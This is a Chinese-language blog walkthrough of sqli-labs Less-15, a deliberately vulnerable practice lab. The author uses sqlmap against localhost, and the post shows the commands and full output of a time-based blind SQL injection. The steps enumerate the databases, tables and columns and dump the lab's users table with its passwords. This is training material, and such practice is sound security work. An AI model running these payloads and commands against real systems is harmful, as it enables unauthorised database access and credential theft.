Sqli-labs 15

黎 浩然/ 14 12 月, 2021/ 安全/SECURITY/ 0 comments

使用sqlmap注入

爆破数据库

C:\Users\dell>sqlmap.py -u "http://localhost/sqli-labs/Less-15/" --forms --dbs
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.12.3#dev}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:16:19 /2021-12-19/

[17:16:19] [INFO] testing connection to the target URL
[17:16:19] [INFO] searching for forms
[1/1] Form:
POST http://localhost/sqli-labs/Less-15/
POST data: uname=&passwd=&submit=Submit
do you want to test this form? [Y/n/q]
>

Edit POST data [default: uname=&passwd=&submit=Submit] (Warning: blank fields detected):

do you want to fill blank fields with random values? [Y/n]

[17:16:27] [INFO] resuming back-end DBMS 'mysql'
[17:16:28] [INFO] using 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0516pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=sNpT' AND (SELECT 3634 FROM (SELECT(SLEEP(5)))rEQi) AND 'yjyG'='yjyG&passwd=&submit=Submit
---
do you want to exploit this SQL injection? [Y/n]

[17:16:29] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.12, Apache 2.4.51
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:16:29] [INFO] fetching database names
[17:16:29] [INFO] fetching number of databases
[17:16:29] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

[17:16:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
7
[17:16:41] [INFO] retrieved:
[17:16:46] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[17:17:44] [INFO] retrieved: challenges
[17:18:15] [INFO] retrieved: mysql
[17:18:32] [INFO] retrieved: performance_schema
[17:19:29] [INFO] retrieved: phpmyadmin
[17:20:04] [INFO] retrieved: security
[17:20:28] [INFO] retrieved: test
available databases [7]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] security
[*] test

[17:20:43] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0516pm.csv'

[*] ending @ 17:20:43 /2021-12-19/

得到7个数据库!

可以看出即使And前面的不正确,后面的sleep函数也会执行

爆破当前数据库名称

C:\Users\dell>sqlmap.py -u "http://localhost/sqli-labs/Less-15/" --forms --current-db
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.12.3#dev}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:40:00 /2021-12-19/

[17:40:00] [INFO] testing connection to the target URL
[17:40:00] [INFO] searching for forms
[1/1] Form:
POST http://localhost/sqli-labs/Less-15/
POST data: uname=&passwd=&submit=Submit
do you want to test this form? [Y/n/q]
>

Edit POST data [default: uname=&passwd=&submit=Submit] (Warning: blank fields detected):

do you want to fill blank fields with random values? [Y/n]

[17:40:10] [INFO] resuming back-end DBMS 'mysql'
[17:40:10] [INFO] using 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0540pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=sNpT' AND (SELECT 3634 FROM (SELECT(SLEEP(5)))rEQi) AND 'yjyG'='yjyG&passwd=&submit=Submit
---
do you want to exploit this SQL injection? [Y/n]

[17:40:11] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.12, Apache 2.4.51
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:40:11] [INFO] fetching current database
[17:40:11] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

[17:40:52] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[17:41:02] [INFO] adjusting time delay to 1 second due to good response times
security
current database: 'security'
[17:41:23] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0540pm.csv'

[*] ending @ 17:41:23 /2021-12-19/

当前数据库名称为security

爆表

C:\Users\dell>sqlmap.py -u "http://localhost/sqli-labs/Less-15/" --forms -D security --tables
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.12.3#dev}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:31:38 /2021-12-19/

[18:31:38] [INFO] testing connection to the target URL
[18:31:38] [INFO] searching for forms
[1/1] Form:
POST http://localhost/sqli-labs/Less-15/
POST data: uname=&passwd=&submit=Submit
do you want to test this form? [Y/n/q]
>

Edit POST data [default: uname=&passwd=&submit=Submit] (Warning: blank fields detected):

do you want to fill blank fields with random values? [Y/n]

[18:31:44] [INFO] resuming back-end DBMS 'mysql'
[18:31:44] [INFO] using 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0631pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=sNpT' AND (SELECT 3634 FROM (SELECT(SLEEP(5)))rEQi) AND 'yjyG'='yjyG&passwd=&submit=Submit
---
do you want to exploit this SQL injection? [Y/n]

[18:31:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.12, Apache 2.4.51
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:31:46] [INFO] fetching tables for database: 'security'
[18:31:46] [INFO] fetching number of tables for database 'security'
[18:31:46] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

[18:32:00] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
4
[18:32:00] [INFO] retrieved:
[18:32:10] [INFO] adjusting time delay to 1 second due to good response times
emails
[18:32:25] [INFO] retrieved: referers
[18:32:49] [INFO] retrieved: uagents
[18:33:11] [INFO] retrieved: users
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

[18:33:23] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0631pm.csv'

[*] ending @ 18:33:23 /2021-12-19/

爆字段

C:\Users\dell>sqlmap.py -u "http://localhost/sqli-labs/Less-15/" --forms -D security -T users --columns
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.12.3#dev}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:35:56 /2021-12-19/

[18:35:56] [INFO] testing connection to the target URL
[18:35:56] [INFO] searching for forms
[1/1] Form:
POST http://localhost/sqli-labs/Less-15/
POST data: uname=&passwd=&submit=Submit
do you want to test this form? [Y/n/q]
>

Edit POST data [default: uname=&passwd=&submit=Submit] (Warning: blank fields detected):

do you want to fill blank fields with random values? [Y/n]

[18:36:01] [INFO] resuming back-end DBMS 'mysql'
[18:36:01] [INFO] using 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0636pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=sNpT' AND (SELECT 3634 FROM (SELECT(SLEEP(5)))rEQi) AND 'yjyG'='yjyG&passwd=&submit=Submit
---
do you want to exploit this SQL injection? [Y/n]

[18:36:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.12, Apache 2.4.51
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:36:02] [INFO] fetching columns for table 'users' in database 'security'
[18:36:02] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[18:36:03] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

[18:36:20] [INFO] adjusting time delay to 1 second due to good response times
3
[18:36:20] [INFO] retrieved: id
[18:36:27] [INFO] retrieved: int(3)
[18:36:52] [INFO] retrieved: username
[18:37:16] [INFO] retrieved: varchar(20)
[18:37:51] [INFO] retrieved: password
[18:38:20] [INFO] retrieved: varchar(20)
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

[18:38:56] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0636pm.csv'

[*] ending @ 18:38:56 /2021-12-19/

爆用户密码

C:\Users\dell>sqlmap.py -u "http://localhost/sqli-labs/Less-15/" --forms -D security -T users -C id,username,password --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.12.3#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:43:20 /2021-12-19/

[18:43:20] [INFO] testing connection to the target URL
[18:43:21] [INFO] searching for forms
[1/1] Form:
POST http://localhost/sqli-labs/Less-15/
POST data: uname=&passwd=&submit=Submit
do you want to test this form? [Y/n/q]
>

Edit POST data [default: uname=&passwd=&submit=Submit] (Warning: blank fields detected):

do you want to fill blank fields with random values? [Y/n]

[18:43:28] [INFO] resuming back-end DBMS 'mysql'
[18:43:28] [INFO] using 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0643pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=sNpT' AND (SELECT 3634 FROM (SELECT(SLEEP(5)))rEQi) AND 'yjyG'='yjyG&passwd=&submit=Submit
---
do you want to exploit this SQL injection? [Y/n]

[18:43:29] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.12, Apache 2.4.51
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:43:29] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'security'
[18:43:29] [INFO] fetching number of column(s) 'id,password,username' entries for table 'users' in database 'security'
[18:43:29] [INFO] resumed: 13
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[18:43:35] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[18:43:40] [INFO] resumed: 1
[18:43:40] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[18:43:46] [INFO] adjusting time delay to 1 second due to good response times
Dumb
[18:43:58] [INFO] retrieved: Dumb
[18:44:10] [INFO] resumed: 2
[18:44:10] [INFO] retrieved: I-kill-you
[18:44:48] [INFO] retrieved: Angelina
[18:45:11] [INFO] resumed: 3
[18:45:11] [INFO] retrieved: p@ssword
[18:45:43] [INFO] retrieved: Dummy
[18:45:59] [INFO] resumed: 4
[18:45:59] [INFO] retrieved: crappy
[18:46:20] [INFO] retrieved: secure
[18:46:37] [INFO] resumed: 5
[18:46:37] [INFO] retrieved: stupidity
[18:47:09] [INFO] retrieved: stupid
[18:47:31] [INFO] resumed: 6
[18:47:31] [INFO] retrieved: genious
[18:47:54] [INFO] retrieved: superman
[18:48:20] [INFO] resumed: 7
[18:48:20] [INFO] retrieved: mob!le
[18:48:43] [INFO] retrieved: batman
[18:49:00] [INFO] resumed: 8
[18:49:00] [INFO] retrieved: admin
[18:49:15] [INFO] retrieved: admin
[18:49:29] [INFO] resumed: 9
[18:49:29] [INFO] retrieved: admin1
[18:49:45] [INFO] retrieved: admin1
[18:50:01] [INFO] resumed: 10
[18:50:01] [INFO] retrieved: admin2
[18:50:18] [INFO] retrieved: admin2
[18:50:35] [INFO] resumed: 11
[18:50:35] [INFO] retrieved: admin3
[18:50:53] [INFO] retrieved: admin3
[18:51:11] [INFO] resumed: 12
[18:51:11] [INFO] retrieved: dumbo
[18:51:28] [INFO] retrieved: dhakkan
[18:51:49] [INFO] resumed: 14
[18:51:49] [INFO] retrieved: admin4
[18:52:06] [INFO] retrieved: admin4
Database: security
Table: users
[13 entries]
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
| 1  | Dumb     | Dumb       |
| 2  | Angelina | I-kill-you |
| 3  | Dummy    | p@ssword   |
| 4  | secure   | crappy     |
| 5  | stupid   | stupidity  |
| 6  | superman | genious    |
| 7  | batman   | mob!le     |
| 8  | admin    | admin      |
| 9  | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+

[18:52:23] [INFO] table 'security.users' dumped to CSV file 'C:\Users\dell\AppData\Local\sqlmap\output\localhost\dump\security\users.csv'
[18:52:23] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\dell\AppData\Local\sqlmap\output\results-12192021_0643pm.csv'

[*] ending @ 18:52:23 /2021-12-19/

基本上只有延时注入能用

Share this Post

Leave a Comment

您的邮箱地址不会被公开。 必填项已用 * 标注

*
*